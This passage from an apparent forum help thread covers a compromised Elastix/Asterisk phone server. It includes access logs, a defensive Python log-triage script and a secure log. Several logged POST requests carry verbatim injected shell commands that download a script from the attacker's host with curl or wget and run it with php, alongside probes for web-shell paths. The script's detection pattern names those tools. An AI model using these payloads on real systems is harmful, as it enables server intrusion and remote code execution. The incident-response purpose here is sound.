                    51.15.12.13 - - [10/Jun/2017:04:55:54 -0400] "POST /recordings/cmd.php?pass=lollol&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:55:54 -0400] "POST /recordings/mcd.php?pass=lollol&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:55:54 -0400] "POST /recordings/dmc.php?pass=lollol&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:55:55 -0400] "POST /recordings/cmd.php?pass=dandan2017&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:55:55 -0400] "POST /recordings/mcd.php?pass=dandan2017&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:55:56 -0400] "POST /recordings/dmc.php?pass=dandan2017&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:55:56 -0400] "POST /recordings/cmd.php?pass=test&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:55:57 -0400] "POST /recordings/mcd.php?pass=test&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:55:57 -0400] "POST /recordings/dmc.php?pass=test&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:55:58 -0400] "POST /recordings/config.amportal.php HTTP/1.1" 403 232
                    51.15.12.13 - - [10/Jun/2017:04:55:58 -0400] "POST /recordings/scan.php HTTP/1.1" 403 221
                    51.15.12.13 - - [10/Jun/2017:04:55:59 -0400] "POST /vtigercrm/a7a.php HTTP/1.1" 404 215
                    51.15.12.13 - - [10/Jun/2017:04:55:59 -0400] "POST /vtigercrm/Hima.php HTTP/1.1" 404 216
                    51.15.12.13 - - [10/Jun/2017:04:56:00 -0400] "POST /vtigercrm/xXx-mat.php HTTP/1.1" 404 219
                    51.15.12.13 - - [10/Jun/2017:04:56:00 -0400] "POST /vtigercrm/Himaa.php HTTP/1.1" 404 217
                    51.15.12.13 - - [10/Jun/2017:04:56:01 -0400] "POST /recordings/3Zz.php HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:56:01 -0400] "POST /vtigercrm/3Zz.php HTTP/1.1" 404 215
                    51.15.12.13 - - [10/Jun/2017:04:56:02 -0400] "POST /vtigercrm/zizo.php HTTP/1.1" 404 216
                    51.15.12.13 - - [10/Jun/2017:04:56:02 -0400] "POST /vtigercrm/ops.php HTTP/1.1" 404 215
                    51.15.12.13 - - [10/Jun/2017:04:56:03 -0400] "POST /vtigercrm/xXx-ELMAYET-xXx.php HTTP/1.1" 404 227
                    51.15.12.13 - - [10/Jun/2017:04:56:03 -0400] "POST /zz.php.call HTTP/1.1" 404 209
                    51.15.12.13 - - [10/Jun/2017:04:56:04 -0400] "POST /vtigercrm/z.php?pass=angel HTTP/1.1" 404 213
                    51.15.12.13 - - [10/Jun/2017:04:56:04 -0400] "POST /z.php?pass=angel HTTP/1.1" 404 203
                    51.15.12.13 - - [10/Jun/2017:04:56:05 -0400] "POST /recordings/lol.php HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:56:05 -0400] "POST /recordings/badr2.php HTTP/1.1" 403 222
                    51.15.12.13 - - [10/Jun/2017:04:56:06 -0400] "POST /recordings/Go.php HTTP/1.1" 403 219
                    51.15.12.13 - - [10/Jun/2017:04:56:06 -0400] "POST /recordings/info.php HTTP/1.1" 403 221
                    51.15.12.13 - - [10/Jun/2017:04:56:07 -0400] "POST /recordings/11.php HTTP/1.1" 403 219
                    51.15.12.13 - - [10/Jun/2017:04:56:07 -0400] "POST /vtigercrm/moaz.php HTTP/1.1" 404 216
                    51.15.12.13 - - [10/Jun/2017:04:56:08 -0400] "POST /vtigercrm/11.php HTTP/1.1" 404 214
                    51.15.12.13 - - [10/Jun/2017:04:56:08 -0400] "POST /11.php HTTP/1.1" 404 204
                    51.15.12.13 - - [10/Jun/2017:04:56:09 -0400] "POST /recordings/a8a.php HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:56:09 -0400] "POST /wav.php HTTP/1.1" 404 205
                    51.15.12.13 - - [10/Jun/2017:04:56:10 -0400] "POST /_asterisk/V-E-M.php?268e31510577740=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 404 217
                    51.15.12.13 - - [10/Jun/2017:04:56:10 -0400] "POST /x1.php HTTP/1.1" 404 204
                    51.15.12.13 - - [10/Jun/2017:04:56:11 -0400] "POST /recordings/webadmin.php HTTP/1.1" 403 225
                    51.15.12.13 - - [10/Jun/2017:04:56:11 -0400] "POST /panel/webadmin.php HTTP/1.1" 404 216
                    51.15.12.13 - - [10/Jun/2017:04:56:12 -0400] "POST /webadmin.php HTTP/1.1" 404 210
                    51.15.12.13 - - [10/Jun/2017:04:56:12 -0400] "POST /panel/main.php HTTP/1.1" 404 212
                    51.15.12.13 - - [10/Jun/2017:04:56:13 -0400] "POST /panel/main.php?act=cmd HTTP/1.1" 404 212
                    51.15.12.13 - - [10/Jun/2017:04:56:13 -0400] "POST /panel/main.php.1 HTTP/1.1" 404 214
                    51.15.12.13 - - [10/Jun/2017:04:56:13 -0400] "POST /panel/main.php.1?act=cmd HTTP/1.1" 404 214
                    51.15.12.13 - - [10/Jun/2017:04:56:13 -0400] "POST /panel/main.php.2 HTTP/1.1" 404 214
                    51.15.12.13 - - [10/Jun/2017:04:56:14 -0400] "POST /panel/main.php.2?act=cmd HTTP/1.1" 404 214
                    51.15.12.13 - - [10/Jun/2017:04:56:14 -0400] "POST /recordings/main.php HTTP/1.1" 403 221
                    51.15.12.13 - - [10/Jun/2017:04:56:14 -0400] "POST /recordings/main.php?act=cmd HTTP/1.1" 403 221
                    51.15.12.13 - - [10/Jun/2017:04:56:14 -0400] "POST /recordings/main.php.1 HTTP/1.1" 403 223
                    51.15.12.13 - - [10/Jun/2017:04:56:15 -0400] "POST /recordings/main.php.1?act=cmd HTTP/1.1" 403 223
                    51.15.12.13 - - [10/Jun/2017:04:56:15 -0400] "POST /recordings/main.php.2 HTTP/1.1" 403 223
                    51.15.12.13 - - [10/Jun/2017:04:56:16 -0400] "POST /recordings/main.php.2?act=cmd HTTP/1.1" 403 223
                    51.15.12.13 - - [10/Jun/2017:04:56:16 -0400] "POST /main.php HTTP/1.1" 404 206
                    51.15.12.13 - - [10/Jun/2017:04:56:16 -0400] "POST /main.php?act=cmd HTTP/1.1" 404 206
                    51.15.12.13 - - [10/Jun/2017:04:56:16 -0400] "POST /vtigercrm/main.php HTTP/1.1" 404 216
                    51.15.12.13 - - [10/Jun/2017:04:56:17 -0400] "POST /vtigercrm/main.php?act=cmd HTTP/1.1" 404 216
                    51.15.12.13 - - [10/Jun/2017:04:56:17 -0400] "POST /config.all.php HTTP/1.1" 404 212
                    51.15.12.13 - - [10/Jun/2017:04:56:17 -0400] "POST /recordings/config.all.php HTTP/1.1" 403 227
                    51.15.12.13 - - [10/Jun/2017:04:56:18 -0400] "POST /panel/config.all.php HTTP/1.1" 404 218
                    51.15.12.13 - - [10/Jun/2017:04:56:18 -0400] "POST /vtigercrm/config.all.php HTTP/1.1" 404 222
                    51.15.12.13 - - [10/Jun/2017:04:56:19 -0400] "POST /admin/config.all.php HTTP/1.1" 404 218
                    51.15.12.13 - - [10/Jun/2017:04:56:19 -0400] "POST /0x4148.php.call HTTP/1.1" 404 213
                    51.15.12.13 - - [10/Jun/2017:04:56:20 -0400] "POST /recordings/misc/?cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 218
                    51.15.12.13 - - [10/Jun/2017:04:56:20 -0400] "POST /graph.php?module=upload HTTP/1.1" 404 207
                    51.15.12.13 - - [10/Jun/2017:04:56:21 -0400] "POST /recordings/graph.php?module=upload HTTP/1.1" 403 222
                    51.15.12.13 - - [10/Jun/2017:04:56:21 -0400] "POST /vtigercrm/graph.php?module=upload HTTP/1.1" 404 217
                    51.15.12.13 - - [10/Jun/2017:04:56:22 -0400] "POST /vtigercrm/phpversions.php?module=upload HTTP/1.1" 404 223
                    51.15.12.13 - - [10/Jun/2017:04:56:22 -0400] "POST /recordings/phpversions.php?module=upload HTTP/1.1" 403 228
                    51.15.12.13 - - [10/Jun/2017:04:56:23 -0400] "POST /phpversions.php?module=upload HTTP/1.1" 404 213
                    216.218.206.66 - - [10/Jun/2017:06:00:25 -0400] "GET / HTTP/1.1" 200 5409
                    216.218.206.66 - - [10/Jun/2017:06:01:06 -0400] "GET / HTTP/1.1" 200 5409
                    183.129.160.229 - - [10/Jun/2017:06:21:05 -0400] "GET / HTTP/1.1" 200 5409
                    163.172.69.33 - - [10/Jun/2017:09:28:26 -0400] "GET / HTTP/1.0" 400 362
                    163.172.69.33 - - [10/Jun/2017:09:28:28 -0400] "GET /recordings//theme/main.css HTTP/1.1" 200 184
                    163.172.69.33 - - [10/Jun/2017:09:30:18 -0400] "POST /recordings/index.php HTTP/1.1" 500 -
                    163.172.69.33 - - [10/Jun/2017:09:30:20 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
                    98.242.248.14 - - [10/Jun/2017:09:45:25 -0400] "GET / HTTP/1.1" 500 -

                      navaismo I did a recursive search for that file and it is only found on /tmp and /var/www/html/_asterisk

                      I delete them over and over but they come back...

                      I see strange POST commands in the access and ssl_access logs, which I have already shared with you.
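One way to triage access-log excerpts like the ones shared above, as an added example that is not part of the original posts. The sample lines are constructed (documentation IP ranges), and the 60-second window, the threshold of 5 and the command-name list are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qsl

# Apache common log format, the shape of the lines posted in this thread.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)
# Heuristic (assumption): a decoded parameter value is treated as a shell command
# when it has a shell metacharacter AND names a common command-line tool.
META_RE = re.compile(r'[;|`]|\$\(|&&')
TOOL_RE = re.compile(r'\b(?:curl|wget|uname|php|rm|sh|bash)\b', re.I)

# Constructed sample input, not copied from any real server.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2017:04:56:09 -0400] "POST /wav.php HTTP/1.1" 404 205
203.0.113.7 - - [10/Jun/2017:04:56:10 -0400] "POST /x1.php HTTP/1.1" 404 204
203.0.113.7 - - [10/Jun/2017:04:56:11 -0400] "POST /recordings/webadmin.php HTTP/1.1" 403 225
203.0.113.7 - - [10/Jun/2017:04:56:12 -0400] "POST /panel/main.php?act=cmd HTTP/1.1" 404 212
203.0.113.7 - - [10/Jun/2017:04:56:13 -0400] "POST /panel/main.php.1 HTTP/1.1" 404 214
203.0.113.7 - - [10/Jun/2017:04:56:14 -0400] "POST /recordings/misc/?cmd=id%3Buname+-a%3Bwget+http%3A%2F%2F203.0.113.7%2Fx.txt+-O+%2Ftmp%2Fa.out HTTP/1.1" 403 218
203.0.113.7 - - [10/Jun/2017:04:58:30 -0400] "POST /recordings/index.php HTTP/1.1" 500 -
198.51.100.20 - - [10/Jun/2017:06:00:25 -0400] "GET / HTTP/1.1" 200 5409
198.51.100.20 - - [10/Jun/2017:06:01:00 -0400] "GET /index.php?menu=pbxconfig HTTP/1.1" 200 5120
"""

def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    path, _, query = rec["target"].partition("?")
    rec["path"] = path
    # parse_qsl percent-decodes and turns '+' into spaces, exposing the payload.
    rec["params"] = parse_qsl(query, keep_blank_values=True)
    return rec

def looks_like_command(value):
    return bool(META_RE.search(value) and TOOL_RE.search(value))

def max_distinct_in_window(events, window):
    """Largest number of distinct paths seen inside any sliding time window."""
    events.sort()
    best, start = 0, 0
    for end in range(len(events)):
        while events[end][0] - events[start][0] > window:
            start += 1
        best = max(best, len({path for _, path in events[start:end + 1]}))
    return best

def analyze(lines, window=timedelta(seconds=60), threshold=5):
    records = [r for r in map(parse_line, lines) if r]
    command_params, probes = [], defaultdict(list)
    for r in records:
        for key, value in r["params"]:
            if looks_like_command(value):
                command_params.append((r["ip"], r["path"], key, value))
        # Requests for PHP files that do not exist or are forbidden.
        if r["status"] in (403, 404) and ".php" in r["path"]:
            probes[r["ip"]].append((r["ts"], r["path"]))
    bursts = {}
    for ip, events in probes.items():
        count = max_distinct_in_window(events, window)
        if count >= threshold:
            bursts[ip] = count
    # Anything a flagged client requested that was NOT rejected with a 4xx
    # deserves a look first: check whether that path exists on disk.
    suspects = set(bursts) | {c[0] for c in command_params}
    answered = [(r["ip"], r["path"], r["status"]) for r in records
                if r["ip"] in suspects and not 400 <= r["status"] < 500]
    return {"command_params": command_params,
            "probe_bursts": bursts,
            "answered": answered}

if __name__ == "__main__":
    report = analyze(SAMPLE_LOG.splitlines())
    for section, items in report.items():
        print(section, items)
```

Run it against both `access_log` and `ssl_access_log`; entries under `answered` are the ones to compare against the files actually present in the web root.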

                      navaismo This is my /var/log/secure log for June 9th:

                      Jun 9 00:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 00:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 00:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 00:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 00:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 00:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 00:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 00:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 00:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 00:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 00:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 00:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 01:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 01:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 01:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 01:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 01:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 01:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 01:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 01:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 01:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 01:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 01:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 01:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 02:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 02:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 02:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 02:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 02:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 02:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 02:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 02:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 02:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 02:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 02:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 02:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 03:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 03:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 03:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 03:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 03:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 03:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 03:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 03:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 03:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 03:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 03:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 03:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 04:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 04:02:01 voicesrv01 runuser: pam_unix(runuser-l:session): session opened for user cyrus by (uid=0)
                      Jun 9 04:02:01 voicesrv01 runuser: pam_unix(runuser-l:session): session closed for user cyrus
                      Jun 9 04:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 04:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 04:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 04:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 04:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 04:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 04:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 04:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 04:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 04:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 04:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 05:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 05:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 05:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 05:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 05:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 05:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 05:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 05:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 05:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 05:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
